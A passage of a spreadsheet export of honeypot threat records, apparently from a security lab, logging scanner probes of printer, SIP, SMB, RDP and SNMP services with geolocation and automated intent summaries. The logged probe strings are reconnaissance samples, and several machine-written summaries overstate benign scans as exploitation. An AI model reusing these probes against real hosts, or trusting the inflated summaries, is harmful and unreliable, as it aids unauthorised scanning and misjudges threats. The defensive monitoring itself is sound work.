CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.118.29:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=56510'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=40262'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,43070)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=40306'}}&amp;&amp;{Data_HTTP:{'Host': '194.4.48.242:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=38511'}}&amp;&amp;{Data_HTTPS:{'Host': '5.182.38.84:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,58636)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=58720'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=50693'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.146.12.172:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.146.12.172:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=48877'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,40534)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.185;rport=58965'}}&amp;&amp;{Data_HTTP:{'Host': '185.250.150.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.90.63.129:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.90.63.129:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.113.33:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '*IDN?_x000a_'}}&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,54406)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.185,39912)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '144.126.148.5:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://144.126.148.5:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.146.12.172:9100_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': ' x01n'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '94.131.97.67:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.97.67:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.60.171.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 149.102.153.168:9100_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a75e:8ab9"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="The attacker is attempting to scan and potentially exploit various network services, including databases, file servers, and authentication systems. They are using a combination of techniques such as port scanning, banner grabbing, and brute-force attacks to identify vulnerable targets. &amp;&amp; An unknown user is sending a POST request with IPP application data to a printer-like service on an IP address, which may be a scanning or probing activity. This could be a reconnaissance attempt or a malicious script trying to exploit the service. The unusual User-Agent string suggests it might be automated software. &amp;&amp; A POST request with a large content length is being sent to the device's printer port, which could be an attempt to exploit or inject malicious code into the system's print queue. This type of activity may indicate a potential vulnerability or attack on the system's printing functionality. The user agent suggests a scanning tool is involved. &amp;&amp; A POST request with a large content length was sent to port 631 on IP address 38.60.171.39, suggesting an attempt to upload malicious data through a potentially vulnerable printer service._x000a_The content type is application/ipp, which indicates it's related to printer or imaging protocol communications._x000a_This could be a reconnaissance or exploitation attempt against the printer service. &amp;&amp; A POST request is being sent to a printer service on IP address 38.60.171.39, indicating possible scanning or probing activity for printer exploitation vulnerabilities._x000a_The User-Agent string suggests the request is likely automated, possibly from a reconnaissance tool or scanner._x000a_This may be an attempt to exploit a specific vulnerability in printer services. &amp;&amp; No suspicious activity detected, data is missing or unknown for IRC-related events. &amp;&amp; No valid log data is available as Data_HTTPS is marked as NA, indicating no activity or error occurred for HTTPS connections. _x000a_This could indicate that the service is down or not functioning properly for HTTPS requests._x000a_Alternatively, it might mean there was no attempt to access the service via HTTPS. &amp;&amp; The data suggests an attempt to retrieve printer information, possibly for reconnaissance or exploitation purposes._x000a_This could be a sign of an attacker trying to identify vulnerable systems on the network. _x000a_It may also indicate a prelude to more malicious activities like unauthorized access or data exfiltration. &amp;&amp; Possible malicious activity is an unauthorized printer query, attempting to retrieve device information, which could be a reconnaissance step before potential further exploitation. This may indicate attempted access or scanning of internal devices. A potentially malicious actor is probing the system for vulnerabilities."/>
    <s v=" Port scanning and exploitation  &amp;&amp; SMB Scanning &amp;&amp; IP Print Attack &amp;&amp; Unknown Access &amp;&amp; Printer Hack &amp;&amp; Printer Hack &amp;&amp; Port Scan &amp;&amp; Scanning Web"/>
  </r>
  <r>
    <x v="125"/>
    <x v="125"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:52:51"/>
    <d v="2023-07-25T04:40:38"/>
    <d v="2025-04-30T15:52:51"/>
    <n v="1819"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Credential_Stuffing_Attack_High"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_SSH_H2&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_SNMP_H9&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_POP3_H13&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_IRC_H2&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_MSSQL_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;161&amp;&amp;6379&amp;&amp;143&amp;&amp;22&amp;&amp;1521&amp;&amp;3389&amp;&amp;80&amp;&amp;3306&amp;&amp;1080&amp;&amp;6667&amp;&amp;5432&amp;&amp;9100&amp;&amp;443&amp;&amp;445&amp;&amp;51336&amp;&amp;110&amp;&amp;5900&amp;&amp;54106&amp;&amp;52431&amp;&amp;1433&amp;&amp;50041&amp;&amp;23&amp;&amp;NA&amp;&amp;389&amp;&amp;55159&amp;&amp;64630&amp;&amp;55695&amp;&amp;53212&amp;&amp;55801&amp;&amp;50216&amp;&amp;55283&amp;&amp;59502&amp;&amp;8443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="101"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QtKcqcNrA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=AbKdCE'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZtbjULYZQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EmaAmw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bEGHrs'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61372)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61382)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61396)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,64752)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,64758)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,64764)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61500)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61508)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.90,61524)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jXYWWEVvY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ndyoNb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NxnBEF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DHezKVMzk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LUDRnP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QzVOkK'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iKpnszXju'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eVzTOU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ulMCnN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NQpnHvjuk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RmBemN'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:185a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;High"/>
    <s v="The data indicates that an attempt was made to access the system's directory services, likely to gain unauthorized access or obtain sensitive information. This could be a reconnaissance phase for further malicious activity. The attempt failed as indicated by &quot;NA&quot; status. &amp;&amp; No activity detected for LDAP service. Data is missing or unavailable, indicating potential probing or scanning. This could be an initial reconnaissance attempt by an attacker. &amp;&amp; No SIP traffic was detected, which could indicate a potential reconnaissance or scanning activity to identify vulnerable services. This might be an attempt to gather information about the system's configuration. The absence of SIP traffic may also suggest that the system is not being actively targeted by malware. &amp;&amp; A client is sending a CAPABILITY command to an IMAP service, likely attempting to gather information about the server's capabilities. This could be a reconnaissance step in a broader malicious activity. The fact that no data is being sent suggests it may not be a brute-force login attempt at this stage. &amp;&amp; No malicious activity detected for FTP service as no data was received. The lack of data suggests either the connection was dropped or the user disconnected prematurely. This is an indication of possibly a failed login attempt or a test probe. &amp;&amp; No log data provided, unable to analyze or comment on possible malicious activity. &amp;&amp; Malicious entity is attempting to negotiate capabilities with a server, potentially preparing for unauthorized access or command execution. This can be a reconnaissance step before carrying out more serious malicious activity. It indicates probing of server functionality. &amp;&amp; A malicious actor is attempting to exploit a service by issuing an initial request to determine supported features, potentially as a precursor to unauthorized access. This could be part of a reconnaissance or exploitation attempt. The actor may be probing for vulnerabilities in the system's configuration."/>
    <s v="LDAP Scan &amp;&amp; Scanning Attempt &amp;&amp; Scanning Attempt &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="126"/>
    <x v="126"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:52:23"/>
    <d v="2025-04-30T15:52:23"/>
    <d v="2025-04-30T15:52:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:43cd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="127"/>
    <x v="127"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:43:34"/>
    <d v="2025-04-30T15:42:46"/>
    <d v="2025-04-30T15:43:34"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:878c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="128"/>
    <x v="128"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T15:43:29"/>
    <d v="2023-08-06T19:26:00"/>
    <d v="2025-04-30T15:43:29"/>
    <n v="457"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
